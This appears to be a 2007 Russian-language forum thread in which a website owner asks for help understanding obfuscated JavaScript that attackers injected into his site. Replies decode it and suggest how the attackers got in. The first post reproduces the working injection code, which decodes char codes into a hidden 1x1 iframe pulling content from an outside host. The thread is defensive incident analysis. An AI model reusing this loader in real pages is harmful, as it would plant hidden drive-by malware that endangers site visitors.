Реклама на сайте


Харьковский сайт знакомств «Познакомлюсь»
Олег, 29 Харьков
Олег, 29
Харьков
Инесса, 24 Харьков
Инесса, 24
Харьков
Оксана, 27 Харьков
Оксана, 27
Харьков
Инна, 21 Харьков
Инна, 21
Харьков
Ferre, 38 Харьков
Ferre, 38
Харьков
Зоя, 26 Харьков
Зоя, 26
Харьков
Коша, 24 Харьков
Коша, 24
Харьков
Елена, 21 Харьков
Елена, 21
Харьков
Сергей, 34 Харьков
Сергей, 34
Харьков
Бидо, 29 Харьков
Бидо, 29
Харьков
Маy, 45 Харьков
Маy, 45
Харьков
Жорж, 77 Харьков
Жорж, 77
Харьков
Надя, 24 Харьков
Надя, 24
Харьков
Татьяна, 35 Харьков
Татьяна, 35
Харьков
Аlёsька, 18 Харьков
Аlёsька, 18
Харьков

Харьков Форум  

Вернуться   Харьков Форум > Hi-Tech... > Софт
Регистрация Группы FAQ's Полезные ссылки Баня Участники Календарь Пометить все разделы прочитанными

Ответ
 
Опции темы Опции просмотра
старое сообщение 19-03-2007, 14:07   #1
Aza~Lord
 
 
Регистрация: 23-02-2006
Сообщений: 81
Попытка взлома моего сайта:в чем суть скрипта

На один мой сайт взломщики поместили следующий скрипт. Расшифровать мне не удалось - что же он делает. Пробывал выводить содержимое в окно - получаются квадраты. Тем не менее он как-то пытается залить экзешники на мой винт.
Может у кого будут идеи - что тут собственно происходит?
Цитата:
<!-- ~ --><SCRIPT LANGUAGE="JavaScript">
<!--
function Decode(){var temp="",i,c=0,out="";var str="60!105!102!114!97!109!101!32!115!114!99!61!34!104!116!116!112!58! 47!47!101!100!109!105!111!46!105!110!102!111!47!116!100!115!47!105!110 !46!99!103!105!63!50!34!32!119!105!100!116!104!61!34!49!34!32!104!101! 105!103!104!116!61!34!49!34!62!60!47!105!102!114!97!109!101!62!";l=str .length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+Stri ng.fromCharCode(temp);temp="";}document.write(out);}
//-->
</SCRIPT><SCRIPT LANGUAGE="JavaScript">
<!--
Decode();
//-->
</SCRIPT><!-- ~ --><br />

Последнее редактирование от Aza~Lord : 19-03-2007 в 14:08. Причина: дополнение темы
Aza~Lord'а на форуме нет :(   Ответить с цитированием
старое сообщение 19-03-2007, 14:24   #2
...:::Alex:::...
 
 
Аватар для ...:::Alex:::...
 
Регистрация: 14-12-2005
Местоположение: N49.971164X E36.264946X
Сообщений: 2,402
  Отправить сообщение для  ...:::Alex:::... с помощью ICQ Send a message via Skype™ to ...:::Alex:::...
жгут
__________________
Не бывает невыполнимых задач - бывает мало денег أود أن أهنئكم ، لدي كيفية ترجمة هذا التوقيع
...:::Alex:::...'а на форуме нет :(   Ответить с цитированием
старое сообщение 19-03-2007, 14:34   #3
Ferox
 
 
Аватар для Ferox
 
Регистрация: 25-09-2006
Местоположение: .
Сообщений: 9,263
 
Подгружает на твой сайт содержимое с урла: edmio.info/tds/in.cgi?2

Оттуда приходит код:

<html>
<head>
<meta http-equiv="REFRESH" content="1; URL='http://google.com'">
</head>
<body>
document moved <a href="http://google.com">here</a>
</body>
</html>

Который перенаправляет браузер пользователя на гугль. Хотя конечно в любой момент код приходящий оттуда может быть заменен, и он будет (к примеру) красть куки пользователя, или пытаться эксплойтировать уязвимости в его броузере.
__________________
Если у тебя на аватаре кот: кликай!
Ferox'а на форуме нет :(   Ответить с цитированием
старое сообщение 19-03-2007, 14:39   #4
Aza~Lord
 
 
Регистрация: 23-02-2006
Сообщений: 81
Цитата:
Сообщение от Ferox
Подгружает на твой сайт содержимое с урла: edmio.info/tds/in.cgi?2[BR/]
[BR/]
Оттуда приходит код:[BR/]
[BR/]
&lt;html&gt;[BR/]
&lt;head&gt;[BR/]
&lt;meta http-equiv=&quot;REFRESH&quot; content=&quot;1; URL='http://google.com'&quot;&gt;[BR/]
&lt;/head&gt;[BR/]
&lt;body&gt;[BR/]
document moved &lt;a href=&quot;http://google.com&quot;&gt;here&lt;/a&gt;[BR/]
&lt;/body&gt;[BR/]
&lt;/html&gt;[BR/]
[BR/]
Который перенаправляет браузер пользователя на гугль. Хотя конечно в любой момент код приходящий оттуда может быть заменен, и он будет (к примеру) красть куки пользователя, или пытаться эксплойтировать уязвимости в его броузере.
Сенк, можешь раскрыть секрет - как это вычислил? Отследил фаерволом? Или как-то расширфовал цифры?
Aza~Lord'а на форуме нет :(   Ответить с цитированием
старое сообщение 19-03-2007, 15:14   #5
Ferox
 
 
Аватар для Ferox
 
Регистрация: 25-09-2006
Местоположение: .
Сообщений: 9,263
 
Напиши в скрипте вместо document.write просто alert
__________________
Если у тебя на аватаре кот: кликай!
Ferox'а на форуме нет :(   Ответить с цитированием
старое сообщение 23-03-2007, 23:27   #6
BFG-9000
 
 
Регистрация: 11-02-2007
Сообщений: 3,444
 
Я бы лучше задался вопросом КАК взломщики разместили на твоем сайте скрипт???
BFG-9000'а на форуме нет :(   Ответить с цитированием
старое сообщение 24-03-2007, 01:14   #7
Flamming Hot
 
 
Аватар для Flamming Hot
 
Регистрация: 18-05-2006
Местоположение: Харьков
Сообщений: 580
Цитата:
Сообщение от BFG-9000 Прочитать
Я бы лучше задался вопросом КАК взломщики разместили на твоем сайте скрипт???
Да легко. Я уверен чел использует т.н. shared hosting и скорее всего SQL, к нему обычными инжектами вломились и все
__________________
The only thing necessary for the triumph of evil is for good men to do nothing.
Flamming Hot'а на форуме нет :(   Ответить с цитированием
Ответ

Опции темы
Опции просмотра

Ваши права в разделе
Вы не можете создавать темы
Вы не можете писать в темах
Вы не можете загружать файлы
Вы не можете править свои посты

BB code is Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.
Быстрый переход


Часовой пояс GMT +3, время: 05:00.


RSS 0.91
RSS 2.0
Powered by vBulletin® Version 3.7.4
Copyright ©2000 - 2008, Jelsoft Enterprises Ltd.
Copyright ©2003 - 2008 www.kharkovforum.com
bigmir)net TOP 100